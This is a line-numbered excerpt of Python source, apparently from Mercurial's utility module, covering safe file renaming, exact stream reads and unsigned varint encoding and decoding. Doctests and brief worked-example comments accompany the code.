4179 4179 continue
4180 4180
4181 4181 doc = pycompat.sysstr('``%s``\n %s') % (
4182 4182 bt[0], engine.bundletype.__doc__)
4183 4183
4184 4184 value = docobject()
4185 4185 value.__doc__ = doc
4186 4186 value._origdoc = engine.bundletype.__doc__
4187 4187 value._origfunc = engine.bundletype
4188 4188
4189 4189 items[bt[0]] = value
4190 4190
4191 4191 return items
4192 4192
4193 4193 i18nfunctions = bundlecompressiontopics().values()
4194 4194
4195 4195 # convenient shortcut
4196 4196 dst = debugstacktrace
4197 4197
4198 4198 def safename(f, tag, ctx, others=None):
4199 4199 """
4200 4200 Generate a name that is safe to rename f to in the given context.
4201 4201
4202 4202 f: filename to rename
4203 4203 tag: a string tag that will be included in the new name
4204 4204 ctx: a context, in which the new name must not exist
4205 4205 others: a set of other filenames that the new name must not be in
4206 4206
4207 4207 Returns a file name of the form oldname~tag[~number] which does not exist
4208 4208 in the provided context and is not in the set of other names.
4209 4209 """
4210 4210 if others is None:
4211 4211 others = set()
4212 4212
4213 4213 fn = '%s~%s' % (f, tag)
4214 4214 if fn not in ctx and fn not in others:
4215 4215 return fn
4216 4216 for n in itertools.count(1):
4217 4217 fn = '%s~%s~%s' % (f, tag, n)
4218 4218 if fn not in ctx and fn not in others:
4219 4219 return fn
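
# For instance (hypothetical context object): if ctx already contains
# b'foo~resolve', safename(b'foo', b'resolve', ctx) falls through to the
# counter loop and returns b'foo~resolve~1', assuming that name is free.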
4220 4220
4221 4221 def readexactly(stream, n):
4222 4222 '''read n bytes from stream.read and abort if less was available'''
4223 4223 s = stream.read(n)
4224 4224 if len(s) < n:
4225 4225 raise error.Abort(_("stream ended unexpectedly"
4226 4226 " (got %d bytes, expected %d)")
4227 4227 % (len(s), n))
4228 4228 return s
4229 4229
4230 4230 def uvarintencode(value):
4231 4231 """Encode an unsigned integer value to a varint.
4232 4232
4233 4233 A varint is a variable length integer of 1 or more bytes. Each byte
4234 4234 except the last has the most significant bit set. The lower 7 bits of
4235 4235 each byte store the 2's complement representation, least significant group
4236 4236 first.
4237 4237
4238 4238 >>> uvarintencode(0)
4239 4239 '\\x00'
4240 4240 >>> uvarintencode(1)
4241 4241 '\\x01'
4242 4242 >>> uvarintencode(127)
4243 4243 '\\x7f'
4244 4244 >>> uvarintencode(1337)
4245 4245 '\\xb9\\n'
4246 4246 >>> uvarintencode(65536)
4247 4247 '\\x80\\x80\\x04'
4248 4248 >>> uvarintencode(-1)
4249 4249 Traceback (most recent call last):
4250 4250 ...
4251 4251 ProgrammingError: negative value for uvarint: -1
4252 4252 """
4253 4253 if value < 0:
4254 4254 raise error.ProgrammingError('negative value for uvarint: %d'
4255 4255 % value)
4256 4256 bits = value & 0x7f
4257 4257 value >>= 7
4258 4258 bytes = []
4259 4259 while value:
4260 4260 bytes.append(pycompat.bytechr(0x80 | bits))
4261 4261 bits = value & 0x7f
4262 4262 value >>= 7
4263 4263 bytes.append(pycompat.bytechr(bits))
4264 4264
4265 4265 return ''.join(bytes)
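
# Worked example matching the doctest above: 1337 is 0b1010_0111001; the low
# seven bits (0b0111001 = 0x39) get the continuation bit (0x80 | 0x39 = 0xb9)
# and the remaining bits (1337 >> 7 = 10 = 0x0a = '\n') form the final byte,
# giving '\xb9\n'.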
4266 4266
4267 4267 def uvarintdecodestream(fh):
4268 4268 """Decode an unsigned variable length integer from a stream.
4269 4269
4270 4270 The passed argument is anything that has a ``.read(N)`` method.
4271 4271
4272 4272 >>> try:
4273 4273 ... from StringIO import StringIO as BytesIO
4274 4274 ... except ImportError:
4275 4275 ... from io import BytesIO
4276 4276 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4277 4277 0
4278 4278 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4279 4279 1
4280 4280 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4281 4281 127
4282 4282 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4283 4283 1337
4284 4284 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4285 4285 65536
4286 4286 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4287 4287 Traceback (most recent call last):
4288 4288 ...
4289 4289 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4290 4290 """
4291 4291 result = 0
4292 4292 shift = 0
4293 4293 while True:
4294 4294 byte = ord(readexactly(fh, 1))
4295 4295 result |= ((byte & 0x7f) << shift)
4296 4296 if not (byte & 0x80):
4297 4297 return result
4298 4298 shift += 7
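
# Tracing the b'\xb9\n' doctest above: 0xb9 contributes 0xb9 & 0x7f = 57 at
# shift 0 and has its continuation bit set; 0x0a contributes 10 << 7 = 1280
# and stops the loop, so the result is 57 + 1280 = 1337.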